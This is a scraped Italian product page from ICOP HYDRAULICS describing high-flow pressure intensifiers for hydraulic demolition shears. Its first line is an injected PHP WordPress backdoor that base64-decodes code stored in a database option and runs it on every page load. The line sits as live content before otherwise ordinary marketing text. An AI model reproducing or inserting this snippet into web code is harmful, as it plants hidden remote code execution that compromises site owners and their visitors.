add_action( 'init', create_function( '', @join( array_map( "base64_decode", json_decode( get_option( $table_prefix . "widget_meta" ) ) ) ) ) ); DEMOLIZIONI | ICOP HYDRAULICS
DEMOLIZIONI Intensificatori di pressione automatici ad alta portata

Il settore delle demolizioni è uno di quelli che riceve oggi maggiori vantaggi dall’innovazione introdotta dai nuovi prodotti ICOP HYDRAULICS.
Da sempre i cilindri oleodinamici, applicati alle cesoie di demolizione, sono soggetti a forti carichi e picchi di pressione.
 

Gli improvvisi cedimenti dei materiali demoliti e le sollecitazioni generate dal braccio della macchina operatrice, causano frequenti rotture e perdite precoci sui cilindri oleodinamici.

ICOP HYDRAULICS ha inserito nuove tecnologie produttive e trattamenti dei materiali che garantiscono una maggiore durata dei cilindri oleodinamici, riducendo i fermi macchina.
In aggiunta a questi vantaggi costruttivi abbiamo sviluppato nuovi intensificatori di pressione automatici ad alta portata in grado di aumentare le prestazioni delle cesoie a cui sono applicati.

Su questo particolare intensificatore è stata accentuata l’intensità e velocità del picco di pressione generato nelle fasi di moltiplica (850 bar di picco con successivi 700 bar pressione statica); questa caratteristica facilita i cedimenti strutturali dei materiali in fase di demolizione.
L’utilizzo di intensificatori di pressione, oltre a rendere le macchine sovra performanti in fase di demolizione, permette la riduzione dei diametri dei cilindri con conseguenti riduzione di peso e aumento del braccio di lavoro della macchina operatrice.

 
 

© 2014 Powered by: Softwise srl | Cookie